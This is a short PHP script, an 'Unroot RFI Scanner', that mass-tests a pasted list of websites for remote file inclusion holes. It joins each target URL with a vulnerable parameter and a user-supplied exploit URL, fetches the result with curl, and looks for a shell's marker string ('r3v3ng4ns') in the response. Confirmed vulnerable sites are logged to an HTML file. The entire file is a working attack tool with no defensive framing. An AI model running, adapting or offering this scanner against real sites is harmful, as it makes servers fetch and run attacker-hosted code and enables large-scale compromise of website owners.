PHP:
<?
#Unroot RFI Scanner (TOOL20.DAT)#
ob_start();
error_reporting(0);
set_time_limit(0);
echo '<title>UnRoot RFI Scanner(TOOL20.DAT) </title><center><form method="post" action="">
String : <input type="text" name="string"><br>
xpl : <input type="text" name="xpl"><br>
<textarea name="list" cols="65" rows="7"></textarea><br>
<input type="submit" value="scan">';
$salvas = "rfi.html";
touch($salvas);
$string = $_POST['string'];
$xpl = $_POST['xpl'];
$xplarch = "r3v3ng4ns";
$list = explode("\n",$_POST['list']);
if(! $_POST['list']==""){
foreach($list as $unwoot){
$trim=trim($unwoot);
$ethical = $trim.$string.$xpl;
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$ethical);
$run = curl_exec($curl);
if(eregi($xplarch,$run)){
echo "<center><font color='red'>http://$ethical</font></center>";
ob_flush();
flush();
$unroot=fopen($salvas,"a");
fwrite($unroot,$ethical);
fclose($unroot);
}
}
}
?>